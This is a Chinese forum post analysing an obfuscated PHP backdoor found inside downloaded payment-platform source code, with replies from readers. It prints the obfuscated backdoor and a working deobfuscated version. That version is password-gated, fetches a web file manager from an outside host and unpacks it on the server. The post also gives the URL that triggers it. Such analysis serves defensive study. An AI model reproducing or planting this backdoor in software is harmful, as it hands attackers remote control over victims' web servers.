混个脸熟,简单分析一个PHP小马
前些天在网上下载了一个支付平台的源码发现里面有个kissme.php文件报毒
提取出来的代码如下图:
懒得手动梳理。
直接扔一个在线美化网站格式化一下,得到代码
<?php
if (!defined("AAAGAGA")) define("AAAGAGA", "AAAGAAG");
$GLOBALS = explode("|^|K|3", "H*|^|K|341414741474747");
if (!defined(pack($GLOBALS, $GLOBALS))) define(pack($GLOBALS, $GLOBALS) , ord(1));
if (!defined("AAAGGAA")) define("AAAGGAA", "AAAGAGG");
$GLOBALS = explode("|v|t|Z", "H*|v|t|Z41414741474741|v|t|Z41414741474147|v|t|Z7C3A7C2D7C35|v|t|Z7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B");
if (!defined(pack($GLOBALS {
0
}
, $GLOBALS {
01
}))) define(pack($GLOBALS {
0
}
, $GLOBALS {
01
}) , pack($GLOBALS {
0
}
, $GLOBALS));
$GLOBALS = explode(pack($GLOBALS {
0
}
, $GLOBALS {
3
}) , pack($GLOBALS {
0
}
, $GLOBALS));
if (!defined("AAAGGGA")) define("AAAGGGA", "AAAGGAG");
$GLOBALS = explode("|K|H|a", "H*|K|H|a41414747414147|K|H|a646566696E65|K|H|a41414747414141|K|H|a70|K|H|a|K|H|a3070656e2e736573616d65|K|H|a687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970|K|H|a2E2F6B6F642E7A6970|K|H|a772B|K|H|a6B6F642E7A6970|K|H|a6B6F642F|K|H|a3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A");
if (!$GLOBALS {
0x1
}
(pack($GLOBALS {
0x0
}
, $GLOBALS {
1
}))) \call_user_func(pack($GLOBALS {
0x0
}
, $GLOBALS) , pack($GLOBALS {
0x0
}
, $GLOBALS {
1
}) , pack($GLOBALS {
0x0
}
, $GLOBALS {
03
}));
$GLOBALS = array(
$_GET
);
$AGAAAAG = & $passwd;
$AGAAAAA = & $ch;
$AAGGGGG = & $source;
$AAGGGGA = & $data;
$AAGGGAG = & $destination;
$file = & $AAGGGAA;
$AAGGAGG = & $zip;
$file_path = & $AAGGAGA;
$AGAAAAG = isset($GLOBALS[(0 - 1225 + 25 * AAGAGGG) ] {
0x0
}
, $GLOBALS {
4
}) ]) ? $GLOBALS[(0 - 1225 + 25 * AAGAGGG) ] {
0x0
}
, $GLOBALS {
4
}) ] : pack($GLOBALS {
0x0
}
, $GLOBALS);
if ($AGAAAAG != pack($GLOBALS {
0x0
}
, $GLOBALS)) {
exit;
}
$AGAAAAA = curl_init();
$AAGGGGG = pack($GLOBALS {
0x0
}
, $GLOBALS {
07
});
curl_setopt($AGAAAAA, CURLOPT_URL, $AAGGGGG);
curl_setopt($AGAAAAA, CURLOPT_RETURNTRANSFER, (AAGAGGG * 41 - 2008));
$AAGGGGA = curl_exec($AGAAAAA);
curl_close($AGAAAAA);
$AAGGGAG = pack($GLOBALS {
0x0
}
, $GLOBALS {
0x8
});
$AAGGGAA = $GLOBALS {
02
}
($AAGGGAG, pack($GLOBALS {
0x0
}
, $GLOBALS));
$GLOBALS {
03
}
($AAGGGAA, $AAGGGGA);
$GLOBALS {
0x4
}
($AAGGGAA);
$AAGGAGG = new ZipArchive();
if ($AAGGAGG->open(pack($GLOBALS {
0x0
}
, $GLOBALS)) === true) {
$AAGGAGG->extractTo(pack($GLOBALS {
0x0
}
, $GLOBALS {
11
}));
$AAGGAGG->close();
}
$AAGGAGA = pack($GLOBALS {
0x0
}
, $GLOBALS {
0x8
});
if ($GLOBALS {
05
}
($AAGGAGA)) {
if ($GLOBALS($AAGGAGA)) {
}
}
echo pack($GLOBALS {
0x0
}
, $GLOBALS {
0xC
});
?>
现在看着顺眼一点,开始一步步分析
我们直接看比较长的字符串,看第七行代码:
$GLOBALS = explode("|v|t|Z", "H*|v|t|Z41414741474741|v|t|Z41414741474147|v|t|Z7C3A7C2D7C35|v|t|Z7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B");
explode函数作用为以第一个参数文本分割第二个参数文本为数组
我们可以加个print_r函数将$GLOBALS 数组输出看看结果:
Array
(
=> H*
=> 41414741474741
=> 41414741474147
=> 7C3A7C2D7C35
=> 7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B
)
上方数组再用 echo pack("H*","41414741474741");方法调试输出一下(第一个参数为上方数组的,第二个参数为上方数组中的,,,),分别得到如下内容:
=>AAGAGGA
=>AAGAGAG
=>|:|-|5
=>|:|-|5defined|:|-|5fopen|:|-|5fputs|:|-|5fclose|:|-|5is_file|:|-|5unlink
//其中, 和的类型等同于上方代码,再进行字符打散为数组得出:
(
=>
=> defined
=> fopen
=> fputs
=> fclose
=> is_file
=> unlink
)
至此,相关声明部分已基本完成
-----------------------------------------------------------------分割线-------------------------------------------------------------
然后我们继续,来到第33行:
$GLOBALS = explode("|K|H|a", "H*|K|H|a41414747414147|K|H|a646566696E65|K|H|a41414747414141|K|H|a70|K|H|a|K|H|a3070656e2e736573616d65|K|H|a687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970|K|H|a2E2F6B6F642E7A6970|K|H|a772B|K|H|a6B6F642E7A6970|K|H|a6B6F642F|K|H|a3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A");
用相同的方法,得到数组内容:
Array
(
=> H*
=> 41414747414147
=> 646566696E65
=> 41414747414141
=> 70
=>
=> 3070656e2e736573616d65
=> 687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970
=> 2E2F6B6F642E7A6970
=> 772B
=> 6B6F642E7A6970
=> 6B6F642F
=> 3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A
)
//再通过pack函数依次进行解码得到如下信息:
=>AAGGAAG
=>define
=>AAGGAAA
=>p
=>
=>0pen.sesame
=>http://static.kodcloud.com/update/download/kodexplorer4.40.zip
=>./kod.zip
=>w+
=>kod.zip
=>kod/
=><a href="./kod" target="_blank">执行成功点击进入</a>
到这里,基本已梳理出小马相关信息了
小马作者利用的是可道云的文件管理信息
上面解码出来的为小马连接密码的参数名,为小马连接密码(芝麻开门??)
当传入密码参数后,服务器将会进行可道云文件管理的zip包,并进行解压,解压目录位于小马目录的kod文件夹
然后返回一个链接,直接点击即可进入文件管理器
小马验证:
将kissme.php放入目录,直接访问:http://127.0.0.1/kissme.php?p=0pen.sesame
片刻后,输出链接,点击后进入可道云资源管理器…… <?php
$passwd = isset($_GET['p']) ? $_GET['p'] : '';
if ($passwd != '0pen.sesame') {
exit;
}
$ch = curl_init();
$source = 'http://static.kodcloud.com/update/download/kodexplorer4.40.zip';
curl_setopt($ch, CURLOPT_URL, $source);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$data = curl_exec($ch);
curl_close($ch);
$destination = './kod.zip';
$AAGGGAA = fopen($destination, 'w+');
fputs($AAGGGAA, $data);
fclose($AAGGGAA);
$zip = new ZipArchive();
if ($zip->open('kod.zip') === true) {
$zip->extractTo('kod/');
$zip->close();
}
$AAGGAGA = './kod.zip';
if (is_file($AAGGAGA)) {
if (unlink($AAGGAGA)) {
}
}
echo "<a href=\"./kod\" target=\"_blank\">执行成功点击进入</a>\n"; 代码还原老司机了 有一个朋友想要知道这个在线美化网站地址 无痕978 发表于 2022-1-18 13:00
有一个朋友想要知道这个在线美化网站地址
度娘搜:php 在线格式化 分析透彻,很不错,值得学习 这种马儿的操作真的很骚,学习了 学习了不错 感谢分享